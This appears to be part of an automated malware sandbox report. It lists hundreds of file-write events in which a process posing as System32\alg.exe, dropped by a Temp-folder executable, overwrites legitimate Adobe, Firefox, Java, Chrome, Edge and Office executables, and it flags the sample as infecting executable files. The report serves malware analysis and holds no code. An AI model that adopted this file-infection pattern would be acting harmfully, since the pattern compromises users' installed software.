                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
